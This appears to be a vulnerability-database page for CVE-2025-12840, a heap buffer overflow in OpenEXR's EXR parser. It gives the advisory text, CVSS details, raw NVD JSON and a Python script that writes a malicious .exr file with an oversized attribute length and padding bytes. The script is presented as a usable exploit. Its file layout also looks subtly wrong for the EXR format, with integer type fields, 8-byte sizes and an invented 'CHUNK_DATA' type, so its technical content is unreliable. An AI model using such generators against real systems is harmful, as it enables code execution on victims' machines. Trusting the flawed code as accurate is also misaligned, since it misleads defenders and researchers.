Security Vulnerability Report
CVE-2025-12840 CVSS 7.8 HIGH

Published: 2025-12-23 22:15:45
Last Modified: 2026-01-15 16:46:26

Description

Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27948.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEXR < latest patched version
Academy Software Foundation OpenEXR (all versions prior to security patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12840 PoC - Malicious EXR File Generator
# Target: Academy Software Foundation OpenEXR < latest version
# Vulnerability: Heap-based Buffer Overflow in EXR parsing
# CVSS: 7.8 (High)

import struct
import os


def create_malicious_exr():
    """
    Generate a malicious EXR file that triggers heap buffer overflow
    during parsing due to improper length validation.
    """
    # EXR magic number
    magic = b'\x76\x2f\x31\x01'

    # Version field - standard EXR v2
    version = struct.pack('<I', 2)
    flags = struct.pack('<I', 0)

    # Craft malicious header with oversized attributes
    # This exploits the lack of proper length validation
    header = b''

    # Channel list with oversized data
    header += b'channels\x00'
    header += struct.pack('<I', 0x02)  # CHUNK_DATA type

    # Create oversized length field - triggers overflow
    # Adjust size based on target buffer allocation
    overflow_size = 0x10000  # Large overflow size
    header += struct.pack('<Q', overflow_size)  # Oversized length
    header += b'A' * overflow_size  # Overflow data

    # Compression attribute
    header += b'compression\x00'
    header += struct.pack('<I', 0)  # NO_COMPRESSION
    header += struct.pack('<Q', 1)
    header += b'\x00'

    # Data window attribute
    header += b'dataWindow\x00'
    header += struct.pack('<I', 0x23)  # BOX2I type
    header += struct.pack('<Q', 16)
    header += struct.pack('<iiii', 0, 0, 1920, 1080)

    # End of header marker
    header += b'\x00'

    # Construct complete EXR file
    malicious_exr = magic + version + flags + header
    return malicious_exr


def main():
    output_file = 'CVE-2025-12840_poc.exr'

    print(f'[*] Generating malicious EXR file for CVE-2025-12840')
    print(f'[*] Target: OpenEXR EXR File Parsing Heap Buffer Overflow')
    print(f'[*] CVSS: 7.8 (High)')

    exr_data = create_malicious_exr()

    with open(output_file, 'wb') as f:
        f.write(exr_data)

    print(f'[+] PoC file created: {output_file}')
    print(f'[+] File size: {len(exr_data)} bytes')
    print(f'[!] Note: This PoC is for educational/research purposes only')
    print(f'[!] Do not use for malicious activities')


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12840", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:44.533", "lastModified": "2026-01-15T16:46:26.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27948."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.3", "matchCriteriaId": "A698C88E-D934-4BCC-9811-3D6FEDFC8320"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-991/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}